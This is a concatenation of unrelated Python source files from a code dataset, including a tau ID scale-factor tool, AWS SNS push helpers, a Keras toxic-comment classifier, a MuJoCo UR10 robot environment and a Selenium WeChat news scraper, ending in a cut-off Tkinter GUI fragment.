@classmethod\n def eager_query(cls):\n from sqlalchemy import orm\n\n query = super(PbcList, cls).eager_query()\n return query.options(\n orm.joinedload('audit_cycle'),\n orm.subqueryload('requests'),\n orm.subqueryload('control_assessments'))\n","sub_path":"src/ggrc/models/pbc_list.py","file_name":"pbc_list.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"89918688","text":"# Author: Izaak Neutelings (July 2019)\n# https://twiki.cern.ch/twiki/bin/viewauth/CMS/TauIDRecommendation13TeV\nimport os\nfrom TauPOG.TauIDSFs import ensureTFile, extractTH1\ndatapath = os.environ['CMSSW_BASE']+\"/src/TauPOG/TauIDSFs/data\"\n\nclass TauIDSFTool:\n \n def __init__(self, year, id, wp='Tight', dm=False, path=datapath):\n \"\"\"Choose the IDs and WPs for SFs. For available tau IDs and WPs, check\n https://cms-nanoaod-integration.web.cern.ch/integration/master-102X/mc102X_doc.html#Tau\"\"\"\n \n years = ['2016Legacy','2017ReReco','2018ReReco']\n assert year in years, \"You must choose a year from %s.\"%(', '.join(years))\n self.ID = id\n self.WP = wp\n \n if id in ['MVAoldDM2017v2','DeepTau2017v2p1VSjet']:\n if dm:\n file = ensureTFile(\"%s/TauID_SF_dm_%s_%s.root\"%(path,id,year))\n self.hist = extractTH1(file,wp)\n self.hist.SetDirectory(0)\n file.Close()\n self.DMs = [0,1,10] if 'oldDM' in id else [0,1,10,11]\n self.getSFvsPT = self.disabled\n self.getSFvsEta = self.disabled\n else:\n file = ensureTFile(\"%s/TauID_SF_pt_%s_%s.root\"%(path,id,year))\n self.func = { }\n self.func[None] = file.Get(\"%s_cent\"%(wp))\n self.func['Up'] = file.Get(\"%s_up\"%(wp))\n self.func['Down'] = file.Get(\"%s_down\"%(wp))\n file.Close()\n self.getSFvsDM = self.disabled\n self.getSFvsEta = self.disabled\n elif id in ['antiMu3','antiEleMVA6']:\n file = ensureTFile(\"%s/TauID_SF_eta_%s_%s.root\"%(path,id,year))\n self.hist = extractTH1(file,wp)\n self.hist.SetDirectory(0)\n file.Close()\n self.genmatches = [1,3] if 'ele' in id.lower() else [2,4]\n self.getSFvsPT = self.disabled\n self.getSFvsDM = self.disabled\n else:\n raise IOError(\"Did not recognize tau ID '%s'!\"%id)\n \n def getSFvsPT(self, pt, genmatch=5, unc=None):\n \"\"\"Get tau ID SF vs. tau pT.\"\"\"\n if genmatch==5:\n return self.func[unc].Eval(pt)\n return 1.0\n \n def getSFvsDM(self, pt, dm, genmatch=5, unc=None):\n \"\"\"Get tau ID SF vs. tau DM.\"\"\"\n if dm in self.DMs or pt<40:\n if genmatch==5:\n bin = self.hist.GetXaxis().FindBin(dm)\n SF = self.hist.GetBinContent(bin)\n if unc=='Up':\n SF += self.hist.GetBinError(bin)\n elif unc=='Down':\n SF -= self.hist.GetBinError(bin)\n return SF\n return 1.0\n return 0.0\n \n def getSFvsEta(self, eta, genmatch, unc=None):\n \"\"\"Get tau ID SF vs. tau eta.\"\"\"\n eta = abs(eta)\n if genmatch in self.genmatches:\n bin = self.hist.GetXaxis().FindBin(eta)\n SF = self.hist.GetBinContent(bin)\n if unc=='Up':\n SF += self.hist.GetBinError(bin)\n elif unc=='Down':\n SF -= self.hist.GetBinError(bin)\n return SF\n return 1.0\n \n @staticmethod\n def disabled(*args,**kwargs):\n raise AttributeError(\"Disabled method.\")\n \n","sub_path":"python/TauIDSFTool.py","file_name":"TauIDSFTool.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10147643","text":"from app import sns_client, sns_resource\nimport os\n\nBASE_ARN = os.environ.get('SNS_BASE_ARN', '')\nPLATFORM_ARN = os.environ.get('SNS_PLATFORM_ARN', '')\nANDROID_ARN = os.environ.get('SNS_ANDROID_ARN', '')\n\ndef subscribe_device(user_id, device_token, ios=True):\n arn_platform = PLATFORM_ARN if ios else ANDROID_ARN\n resp = sns_client.create_platform_endpoint(\n PlatformApplicationArn=arn_platform,\n Token=device_token\n )\n \n endpoint_arn = resp.get('EndpointArn', None)\n if endpoint_arn is None:\n return\n\n # Subscribe this device to user's notifications\n resp = sns_client.create_topic(Name=user_id)\n topic_arn = resp.get('TopicArn', None)\n if topic_arn is None:\n return\n\n sns_client.subscribe(\n TopicArn=topic_arn,\n Protocol='application',\n Endpoint=endpoint_arn\n )\n\ndef publish_to_user(user_id, message):\n topic_arn = BASE_ARN + user_id\n topic = sns_resource.Topic(topic_arn)\n topic.publish(\n TopicArn=topic_arn,\n Message=message\n )\n\n","sub_path":"server/app/aws_sns.py","file_name":"aws_sns.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"450586454","text":"\n\nfrom xai.brain.wordbase.adjectives._arctic import _ARCTIC\n\n#calss header\nclass _ARCTICS(_ARCTIC, ):\n\tdef __init__(self,): \n\t\t_ARCTIC.__init__(self)\n\t\tself.name = \"ARCTICS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"arctic\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_arctics.py","file_name":"_arctics.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"123015139","text":"\"\"\"\nTODO: None!\n\"\"\"\nimport numpy as np\nimport keras.backend as K\nfrom keras.models import Model\nfrom keras.layers import concatenate, multiply\nfrom keras.layers import BatchNormalization, Dropout, SpatialDropout1D\nfrom keras.layers import GlobalMaxPool1D\nfrom keras.layers import Activation, Lambda, Permute, Reshape, RepeatVector, TimeDistributed\nfrom keras.layers import Bidirectional, CuDNNGRU, Dense, Embedding, Input\n\nfrom utils import get_embeddings\nfrom utils import shuffle_data\n\n\nclass ToxicClassifier(object):\n \"\"\"Class for classifying the toxicity of a sentence.\n\n Parameters\n ----------\n embedding_dim : Scalar dimension of input embeddings.\n num_timesteps : Maximum number of timesteps to be processed (i.e. num. words in input).\n word_index : List of all tokens (words) in the corpus.\n weight_path : String specifying where to save weights during training.\n use_aux_input : Boolean, use auxilliary input during training and testing.\n average_attention : Boolean, verage attention values over the time dimension for each input.\n use_ft : Boolean, use fasttext embeddings instead of GloVe embeddings.\n visualize : Boolean, create plots of attention activations.\n \"\"\"\n\n def __init__(self, embedding_dim, num_timesteps, word_index, weight_path,\n use_aux_input=False, average_attention=False,\n use_ft=False, visualize=False):\n self.embedding_dim = embedding_dim\n self.num_timesteps = num_timesteps\n self.attention_layer_count = 0\n\n self.weight_path = weight_path\n\n self.average_attention = average_attention\n self.use_aux_input = use_aux_input\n self.use_ft = use_ft\n self.visualize = visualize\n\n self.CLASS_LIST = ['toxic', 'severe_toxic', 'obscene',\n 'threat', 'insult', 'identity_hate']\n\n def get_attention_output(self):\n \"\"\"Return attention of a single input to the model.\n\n Returns\n -------\n attention: Array of attention weight for teach element in input.\n\n \"\"\"\n self.load_best_weights\n if self.use_aux_input:\n attention = self.attention_layer_model.predict(\n [self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)],\n batch_size=1)\n else:\n attention = self.attention_layer_model.predict(\n self.sample_sequence.reshape(1, self.num_timesteps), batch_size=1)\n\n return attention[0, -self.sample_length:, 0]\n\n def get_sample_labels(self):\n \"\"\"Return class names corresponding to sample target.\"\"\"\n labels = [i for i, j in zip(self.CLASS_LIST, self.sample_target) if j]\n if labels == []:\n labels = ['not_toxic']\n\n return labels\n\n def get_training_predictions(self):\n return self.model.predict_on_dataset([self.X_train, self.X_aux])\n\n def set_input_and_labels(self, X_train, y_train, X_aux=None):\n \"\"\"Set training input and -labels.\n\n Parameters\n ----------\n X_train : Array of input features.\n y_train : Array of output labels.\n X_aux : Optional array of auxilliary inputs, i.e. engineered features.\n\n \"\"\"\n self.X_train = X_train\n self.y_train = y_train\n self.X_aux = X_aux\n\n def set_sample_sentence(self, sample_text, sample_sequence,\n sample_target, sample_aux=None):\n \"\"\"Set sample sentence and variables to store attention activations.\n\n Parameters\n ----------\n sample_text : Preprocessed text of sample.\n sample_sequence : Padded and tokenized representation of sample text.\n sample_aux : Optional auxilliary input for sample, i.e. engineered features.\n \"\"\"\n self.sample_text = sample_text\n self.sample_sequence = sample_sequence\n self.sample_target = sample_target\n self.sample_aux = sample_aux\n self.sample_length = len(self.sample_text.split(' '))\n if self.visualize:\n self.attention_history = np.zeros((1, self.sample_length))\n\n def _attention_3d_block(self, inputs):\n \"\"\"Return attention vector evaluated over input. If SINGLE_ATTENTION_VECTOR\n argument is given a temporal mean is taken over the time_step dimension.\n\n Parameters\n ----------\n inputs : A tensor of shape (batch_size, time_steps, input_dim).\n Time_steps is represented by the input length, i.e. the number of tokens,\n while input_dim is the number of nodes in the previous nn layer.\n\n Returns\n -------\n output_attention : A tensor of shape (batch_size, time_steps, input_dim),\n representing the attention given to each input token.\n\n \"\"\"\n self.attention_layer_count += 1\n input_dim = int(inputs.shape[2])\n a = Permute((2, 1))(inputs)\n a = Reshape((input_dim, self.num_timesteps))(a)\n a = Dense(self.num_timesteps, activation='softmax')(a)\n\n if self.average_attention:\n a = Lambda(lambda x: K.mean(x, axis=1), name='dim_reduction')(a)\n a = RepeatVector(input_dim)(a)\n\n attention_layer_name = 'attention_layer_' + str(self.attention_layer_count)\n context_name = 'context_vec_' + str(self.attention_layer_count)\n self.last_attention_layer_name = attention_layer_name\n\n a_probs = Permute((2, 1), name=attention_layer_name)(a)\n output_attention = multiply([inputs, a_probs], name=context_name)\n\n return output_attention\n\n def build_model(self, word_index, use_skipgram=True):\n \"\"\"Return a compiled Keras model for sentence classification.\n\n Parameters\n ----------\n word_index : List of tokens in input data\n use_skipgram : Boolean, whether to use fasttext skipgram word vectors.\n If false, cbow model word vectors will be used instead.\n\n Returns\n -------\n model : A compiled Keras model for predicting six types of toxicity\n in a sentencee.\n attention_layer_model : A Keras model for extracting the attention\n layer output.\n\n \"\"\"\n\n gru_units = [96]\n dense_units = [64]\n\n dropout_prob = 0.4\n\n model_input = Input(shape=(self.num_timesteps, ), name='model_input')\n embedding_matrix = get_embeddings(word_index=word_index,\n embedding_dim=self.embedding_dim,\n use_ft_embeddings=self.use_ft,\n use_skipgram=use_skipgram)\n x = Embedding(len(word_index) + 1, # +1 for 0 padding token\n self.embedding_dim,\n weights=[embedding_matrix],\n input_length=self.num_timesteps,\n trainable=False)(model_input)\n\n for n in range(len(gru_units)):\n x = SpatialDropout1D(dropout_prob)(x)\n x = Bidirectional(CuDNNGRU(units=gru_units[n],\n return_sequences=True))(x)\n x = BatchNormalization()(x)\n x = TimeDistributed(Activation('tanh'))(x)\n\n x = SpatialDropout1D(dropout_prob)(x)\n attention = self._attention_3d_block(inputs=x)\n dense_input = GlobalMaxPool1D()(attention)\n\n if self.use_aux_input:\n aux_input = Input(shape=(3, ), name='aux_input')\n dense_input = concatenate([dense_input, aux_input])\n\n for n in range(len(dense_units)):\n dense = Dropout(dropout_prob)(dense_input)\n dense = Dense(dense_units[n], activation=None)(dense)\n dense = BatchNormalization()(dense)\n dense = Activation('elu')(dense)\n\n dense = Dropout(dropout_prob)(dense)\n probs = Dense(6, activation='sigmoid')(dense)\n\n if self.use_aux_input:\n self.model = Model(inputs=[model_input, aux_input], output=probs)\n else:\n self.model = Model(inputs=model_input, output=probs)\n\n self.model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n print(self.last_attention_layer_name)\n self.attention_layer_model = Model(inputs=self.model.input,\n outputs=self.model.get_layer(\n self.last_attention_layer_name).output)\n\n def load_best_weights(self):\n \"\"\"Load best weights into model.\"\"\"\n self.model.load_weights(self.weight_path)\n\n def train(self, max_epochs, batch_size, val_split, callbacks):\n \"\"\"Train model, using specified epoch number, batch_size and callbacks.\n\n Parameters\n ----------\n max_epochs : The maximum number of epochs to train for.\n batch_size : Batch size used during training, i.e. the number of sentences.\n callbacks : List of Keras callbacks.\n\n \"\"\"\n if self.use_aux_input:\n _X_train, _y_train, _X_aux = shuffle_data(self.X_train, self.y_train, self.X_aux)\n else:\n _X_train, _y_train = shuffle_data(self.X_train, self.y_train)\n\n if self.visualize:\n for epoch in range(max_epochs):\n if self.use_aux_input:\n self.model.fit([_X_train, _X_aux], _y_train,\n batch_size=batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_split=val_split,\n callbacks=callbacks)\n attention_output = self.attention_layer_model.predict(\n [self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)], batch_size=1)\n else:\n self.model.fit(_X_train, _y_train,\n batch_size=batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_split=val_split,\n callbacks=callbacks)\n attention_output = self.get_attention_output\n\n self.attention_history = np.append(\n self.attention_history,\n [attention_output[0, -self.sample_length:, 0]],\n axis=0)\n else:\n if self.use_aux_input:\n self.model.fit([_X_train, _X_aux], _y_train,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_split=0.15,\n callbacks=callbacks)\n else:\n self.model.fit(_X_train, _y_train,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_split=0.1,\n callbacks=callbacks)\n print('Training done\\n')\n\n def predict_on_dataset(self, data, aux_input=None):\n \"\"\"Predict on an entire dataset at once using trained model.\n\n Parameters\n ----------\n data : Numpy array containing input data.\n aux_input : Optional auxilliary input (i.e. engineered features).\n\n Returns\n pred : Array of probabilities for the different types of toxicity.\n\n \"\"\"\n self.load_best_weights\n if aux_input is not None:\n try:\n assert self.use_aux_input\n except AssertionError:\n print('ERROR: Unexpexcted auxilliary input passed to predict function')\n exit\n preds = self.model.predict([data, aux_input])\n else:\n preds = self.model.predict(data)\n\n return preds\n\n def predict_sample_output(self):\n \"\"\"Predict on a single sample text using trained model.\n\n Returns\n -------\n pred : Array of probabilities for the different types of toxicity.\n\n \"\"\"\n self.load_best_weights\n if self.use_aux_input:\n pred = self.model.predict([self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)],\n batch_size=1)\n else:\n pred = self.model.predict(self.sample_sequence.reshape(1, self.num_timesteps),\n batch_size=1)\n\n return pred\n","sub_path":"toxic_classifier.py","file_name":"toxic_classifier.py","file_ext":"py","file_size_in_byte":12674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"516781443","text":"#!/usr/bin/env python\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nimg = sys.argv[1]\n\nlabels = ['1', '2', '4', '8', '10']\n\nplt.figure()\nfor label in labels:\n try:\n df = pd.read_csv('%s/cpu_stats.csv' % (label))\n sel = df['com.docker.compose.service'] == 'idlememstat'\n X = df['time'][sel]\n X = np.array(X, dtype='datetime64[ns]')\n Y = df['percent_usage'][sel]\n X = X - X[0]\n plt.plot(X,Y,label=label)\n except Exception as e:\n print(e)\nplt.legend()\nplt.savefig(img)\n","sub_path":"lab/eval/ir/cpucost/data/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"450374094","text":"import os\nimport numpy\nimport yaml\nimport pandas\nimport mujoco_py\nimport json\nfrom gym.envs.robotics import rotations, robot_custom_env, utils\nfrom gym.envs.robotics.ur10 import randomize\nfrom scipy.signal import lfilter, lfilter_zi, butter\n#from utils.saving import NumpyEncoder\n\nPROJECT_PATH = os.path.join(*[os.getenv(\"HOME\"), \"DRL_AI4RoMoCo\"])\nMODEL_PATH = os.path.join(*[PROJECT_PATH, \"code\", \"environment\", \"UR10_new\"])\nCONFIG_PATH = os.path.join(*[PROJECT_PATH, \"code\", \"config\", \"environment\"])\nSAVE_PATH = os.path.join(*[\n PROJECT_PATH, \n \"code\", \n \"data\", \n \"EVAL_SOURCESIM\", \n \"StaticPositionEnv\",\n ])\nGOAL_PATH = os.path.join(*[\n PROJECT_PATH, \n \"code\", \n \"environment\", \n \"experiment_configs\", \n \"goal_ur10_simpheg_conf2.json\"\n ])\n\ndef goal_distance(obs, goal):\n '''Computation of the distance between gripper and goal'''\n obs = obs[:6]\n assert obs.shape == goal.shape\n return numpy.linalg.norm(obs*numpy.array([1, 1, 1, 0.3, 0.3, 0.3]), axis=-1)\n\ndef normalize_rad(angles):\n '''Normalizing Euler angles'''\n angles = numpy.array(angles)\n angles = angles % (2*numpy.pi)\n angles = (angles + 2*numpy.pi) % (2*numpy.pi)\n for i in range(len(angles)):\n if (angles[i] > numpy.pi):\n angles[i] -= 2*numpy.pi\n return angles\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, numpy.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\nclass Ur10Env(robot_custom_env.RobotEnv):\n \"\"\"Superclass for all Ur10 environments.\"\"\"\n\n def __init__(self, env_config,):\n \n with open(env_config) as cfg:\n env_config = yaml.load(cfg, Loader=yaml.FullLoader)\n\n self.save_data = env_config[\"Saving\"]\n self.start_flag = True\n self.episode = 0\n if self.save_data:\n self.fts = []\n self.fxs = []\n self.fys = []\n self.fzs = []\n self.obs = []\n self.rewards = []\n self.poses = []\n self.SEED = env_config[\"SEED\"]\n self.run_info = env_config[\"info\"]\n self.results = list() #list(numpy.zeros(10,).astype(int))\n self.R1 = env_config[\"Reward\"][\"R1\"]\n self.R2 = env_config[\"Reward\"][\"R2\"]\n self.success_reward = env_config[\"Reward\"][\"success_reward\"]\n self.model_path = os.path.join(*[MODEL_PATH, env_config[\"model_xml_file\"]]) \n self.initial_qpos = numpy.array(env_config[\"initial_qpos\"]) \n self.sim_ctrl_q = self.initial_qpos \n self.reward_type = env_config[\"reward_type\"] \n self.ctrl_type = env_config[\"ctrl_type\"] \n self.n_substeps = env_config[\"n_substeps\"]\n self.action_rate = env_config[\"action_rate\"] \n self.distance_threshold = env_config[\"Learning\"][\"distance_threshold\"]\n self.cur_eps_threshold = env_config[\"Learning\"][\"cur_eps_threshold\"]\n self.curriculum_learning = env_config[\"Learning\"][\"curriculum_learning\"]\n self.initial_distance_threshold = env_config[\"Learning\"][\"initial_distance_threshold\"]\n self.final_distance_threshold = env_config[\"Learning\"][\"final_distance_threshold\"] \n self.fail_threshold = env_config[\"Learning\"][\"fail_threshold\"] \n self.n_actions = env_config[\"n_actions\"]\n self.corrective = env_config[\"corrective\"]\n self.vary = env_config[\"vary\"]\n self.dx_max = env_config[\"dx_max\"]\n \n ########################\n \n super(Ur10Env, self).__init__(\n model_path=self.model_path, n_substeps=self.n_substeps,\n n_actions=self.n_actions,initial_qpos=self.initial_qpos, \n seed=self.SEED, success_reward=self.success_reward,\n action_rate = self.action_rate)\n\n def activate_noise(self):\n self.vary=True\n print('noise has been activated.')\n \n def compute_reward(self, obs, goal, info):\n d = goal_distance(obs,goal)\n f = numpy.absolute(obs[7])\n + numpy.absolute(obs[8])\n + numpy.absolute(obs[9])\n rew = self.R1 * (-d) + self.R2 *(-f)\n if self.save_data:\n self.rewards.append(rew)\n self.step_count += 1\n return rew\n\n def _step_callback(self):\n pass\n \n def set_state(self, qpos):\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(\n old_state.time,\n qpos, \n old_state.qvel,\n old_state.act, \n old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def _set_action(self, action):\n assert action.shape == (6,)\n # ensure that we don't change the action outside of this scope\n action = action.copy() \n deviation = sum(abs(self.sim.data.qpos - self.sim.data.ctrl))\n\n # reset control to current position if deviation too high\n if deviation > 0.35: \n self.sim.data.ctrl[:] = self.sim.data.qpos \n + self.get_dq([0, 0, 0.005, 0, 0, 0])\n print('deviation compensated')\n\n if self.ctrl_type == \"joint\":\n action *= 0.05 # limit maximum change in position\n # Apply action #scalarsto simulation.\n utils.ctrl_set_action(self.sim, action)\n elif self.ctrl_type == \"cartesian\":\n dx = action.reshape(6, )\n\n max_limit = self.dx_max\n '''\n limitation of operation space, we only allow small rotations \n adjustments in x and z directions, moving in y direction\n '''\n x_now = numpy.concatenate((\n self.sim.data.get_body_xpos(\"gripper_dummy_heg\"),\n self.sim.data.get_body_xquat(\"gripper_dummy_heg\")))\n x_then = x_now[:3] + dx[:3]*max_limit\n\n #diff_now = numpy.array(x_now - self.init_x).reshape(7,)\n diff_then = numpy.array(x_then[:3] - self.init_x[:3])\n\n barriers_min = numpy.array([-0.4, -0.8, -0.4])\n barriers_max = numpy.array([0.4, 0.8, 0.4])\n '''\n for i in range(3):\n if (barriers_min[i] < diff_then[i] < barriers_max[i]):\n dx[i] = dx[i] * max_limit\n elif barriers_min[i] > diff_then[i]:\n dx[i] = + max_limit\n elif barriers_max[i] < diff_then[i]:\n dx[i] = - max_limit\n for i in range(3,6):\n dx[i] = dx[i] * max_limit\n '''\n for i in range(6):\n dx[i] = dx[i] * max_limit\n \n if self.corrective:\n # bias in direction of assembly\n bias_dir = -self.last_obs[:6]\n # print(bias_dir)\n for i in range(3,6):\n if bias_dir[i] > 0.5:\n print(i, bias_dir[i])\n bias_dir[i] = bias_dir[i] # slower rotations\n bias_dir /= numpy.linalg.norm(bias_dir)\n # print(bias_dir)\n dx += bias_dir * max_limit * 0.5\n dx.reshape(6, 1)\n\n dq = self.get_dq(dx)\n # print(sum(abs(sim.data.qpos-sim.data.ctrl)))\n for i in range(6):\n self.sim.data.ctrl[i] += dq[i]\n\n def get_dq(self, dx):\n jacp = self.sim.data.get_body_jacp(name=\"gripper_dummy_heg\").reshape(3, 6)\n jacr = self.sim.data.get_body_jacr(name=\"gripper_dummy_heg\").reshape(3, 6)\n jac = numpy.vstack((jacp, jacr))\n dq = numpy.linalg.lstsq(jac, dx)[0].reshape(6, )\n return dq\n\n def _get_obs(self):\n rot_mat = self.sim.data.get_body_xmat('gripper_dummy_heg')\n ft = self.sim.data.sensordata.copy()\n\n if self.start_flag:\n ft = numpy.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])\n self.start_flag = False\n\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_mat = self.sim.data.get_body_xmat(\"gripper_dummy_heg\")\n rpy = normalize_rad(rotations.mat2euler(x_mat))\n\n obs = numpy.concatenate([\n rot_mat.dot(x_pos-self.goal[:3]),\n rot_mat.dot(normalize_rad(rpy-self.goal[3:])),\n ft.copy()\n ])\n if self.save_data:\n self.fts.append([ft[0], ft[1], ft[2], ft[3], ft[4], ft[5],])\n self.obs.append(obs)\n self.fxs.append(ft[0])\n self.fys.append(ft[1])\n self.fzs.append(ft[2])\n self.poses.append(numpy.concatenate(\n [x_pos-self.goal[:3],\n normalize_rad(rpy-self.goal[3:])]))\n self.last_obs = obs\n return obs\n \n def _viewer_setup(self):\n body_id = self.sim.model.body_name2id('body_link')\n lookat = self.sim.data.body_xpos[body_id]\n for idx, value in enumerate(lookat):\n self.viewer.cam.lookat[idx] = value\n self.viewer.cam.distance = 2.5\n self.viewer.cam.azimuth = 132.\n self.viewer.cam.elevation = -14.\n \n def _render_callback(self):\n pass\n \n def _reset_sim(self):\n # Tracking the first step to zero the ft-sensor\n self.start_flag = True\n if self.episode > 0:\n self.success_rate = float(numpy.sum(self.results)/float(len(self.results)))\n print(\"Episode: {} Success Rate: {} \".format(self.episode, self.success_rate))\n if len(self.results) < 10:\n self.results.append(0)\n else:\n self.results.pop(0)\n self.results.append(0)\n \n if self.save_data and self.episode > 0:\n if self.success_flag == 1:\n self.rewards.append(self.success_reward)\n self.reward_sum = numpy.sum(self.rewards)\n \n save_dict = {\n #\"observations\" : self.obs,\n #\"ft_values\" : self.fts,\n #\"rewards\" : self.rewards,\n #\"poses\" : self.poses\n \"fx\" : self.fxs,\n \"fy\" : self.fys,\n \"fz\" : self.fzs,\n \"steps\" : self.step_count,\n \"success\" : self.success_flag,\n \"reward\" : self.reward_sum\n }\n with open(os.path.join(*[SAVE_PATH, \"episode_{}.json\".format(self.episode)]), \"w\") as file:\n json.dump(save_dict,file)\n file.write('\\n')\n \n #self.obs = []\n #self.fts = []\n #self.rewards = []\n #self.poses = []\n self.fxs = []\n self.fys = []\n self.fzs = []\n self.rewards = []\n self.step_count = 0\n self.success_flag = 0\n self.episode += 1\n \n if self.vary == True:\n # deviation in x,y,z, direction rotation stays the same\n deviation_x = numpy.concatenate(\n (numpy.random.normal(loc=0.0, scale=1.0, size=(3,)),\n [0, 0, 0]))\n deviation_q = self.get_dq(deviation_x * 0.005)\n else:\n deviation_q = numpy.array([0, 0, 0, 0, 0, 0])\n self.set_state(self.initial_qpos + deviation_q)\n self.sim.forward()\n self.init_x = numpy.concatenate(\n (self.sim.data.get_body_xpos(\"gripper_dummy_heg\"), \n self.sim.data.get_body_xquat(\"gripper_dummy_heg\")\n ))\n self.sim.data.ctrl[:] = self.initial_qpos + deviation_q\n return True\n\n def _sample_goal(self):\n\n with open(GOAL_PATH, encoding='utf-8') as file:\n goal = json.load(file)\n xpos = goal['xpos']\n xquat = goal['xquat']\n rpy = normalize_rad(rotations.quat2euler(xquat))\n return numpy.concatenate([xpos, rpy]).copy()\n\n def _is_success(self, achieved_goal, desired_goal):\n rot_mat = self.sim.data.get_body_xmat('gripper_dummy_heg')\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_mat = self.sim.data.get_body_xmat(\"gripper_dummy_heg\")\n rpy = normalize_rad(rotations.mat2euler(x_mat))\n obs = numpy.concatenate([\n rot_mat.dot(x_pos-self.goal[:3]), \n rot_mat.dot(normalize_rad(rpy-self.goal[3:]))\n ])\n d = goal_distance(obs,desired_goal)\n if self.curriculum_learning:\n if self.episode < self.cur_eps_threshold:\n if d < self.initial_distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 1\n return True\n else:\n return False\n else:\n if d < self.final_distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 1\n return True\n else:\n return False\n else:\n if d < self.distance_threshold:\n if len(self.results) == 0:\n self.results.append(1)\n else:\n self.results.pop()\n self.results.append(1)\n self.success_flag = 1\n return True\n else:\n return False\n\n def _is_failure(self, achieved_goal, desired_goal):\n #d = goal_distance(achieved_goal, desired_goal)\n # removed early stop because baselines did not work with it\n #return (d > self.fail_threshold)\n #& (numpy.round(self.sim.get_state()[0]/0.0005).astype('int') > 200)\n return False\n\n def _env_setup(self, initial_qpos):\n self.sim.data.ctrl[:] = initial_qpos\n self.set_state(initial_qpos)\n self.sim.forward()\n\n def render(self, mode='human', width=500, height=500):\n return super(Ur10Env, self).render(mode, width, height)","sub_path":"gym/envs/robotics/ur10_static_position_env.py","file_name":"ur10_static_position_env.py","file_ext":"py","file_size_in_byte":14269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"323067856","text":"import time\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\n# 获取微信公众号新闻\n\ndef get_access():\n return webdriver.Firefox()\n\n\ndef search_page(driver, url):\n driver.get(url)\n print(driver.current_url)\n elem = driver.find_element_by_class_name(\"query\")\n elem.send_keys(u\"国际农业航空施药技术联合实验室\")\n btn = driver.find_element_by_class_name(\"swz2\")\n btn.click()\n print(driver.current_url)\n time.sleep(1)\n page = driver.page_source\n return page\n\n\ndef load_page(driver, url):\n driver.get(url)\n page = driver.page_source\n return page\n\n\ndef next_page(page):\n soup = BeautifulSoup(page, \"html5lib\")\n link = soup.find('div', attrs={\"class\": \"img-box\"})\n link_to = link.find('a')\n return link_to.attrs['href']\n\n\ndef get_news_urls(page):\n base_url = 'https://mp.weixin.qq.com'\n # 存储新闻页面的列表\n news_urls = {}\n soup = BeautifulSoup(page, \"html5lib\")\n # 新闻列表\n news_list = soup.find_all('h4', attrs={'class': 'weui_media_title'})\n # 全部新闻标题\n for i in news_list:\n news_title = i.get_text()\n news_url = base_url + i.attrs['hrefs']\n news_urls[news_title] = news_url\n return news_urls\n\n\ndef get_news(news_urls):\n for url in news_urls:\n print(url, news_urls[url])\n\n\ndef initial():\n html_url = \"http://weixin.sogou.com/\"\n web_look = get_access()\n html_url = search_page(web_look, html_url)\n true_url = next_page(html_url)\n news_urls = get_news_urls(load_page(web_look, true_url))\n get_news(news_urls)\n\n\nif __name__ == '__main__':\n initial()\n","sub_path":"get_news/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"214804908","text":"#IMPORTS\nfrom threading import Thread\n\nfrom ttkthemes import ThemedStyle\n\nimport Helper_Method\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport time\n\nfrom AgglomerativeClusteringClassifier import ACC_Model_Trainer, ACC_Data_To_CSV, ACC_User_Input\nfrom Constats import Status\nfrom WordGramClassifier import WGC_Data_To_CSV, WGC_Model_Trainer, WGC_User_Input\nfrom MergedClassifier import MC_Data_To_CSV, MC_Model_Trainer, MC_User_Input\nfrom KmeanClusteringClassifier import CC_Data_To_CSV, CC_Model_Trainer, CC_User_Input\nfrom StyleClassifier import SC_Data_To_CSV, SC_Model_Trainer, SC_User_Input\nfrom pathlib import Path\n\n\ndef global_timer():\n while True:\n is_model_trained()\n time.sleep(1)\n\n if Status.is_app_waiting:\n message_status(\"Processing Please Wait!\", 1)\n button2.configure(state='disabled')\n button3.configure(state='disabled')\n button4.configure(state='disabled')\n else:\n message_status(\"Waiting For 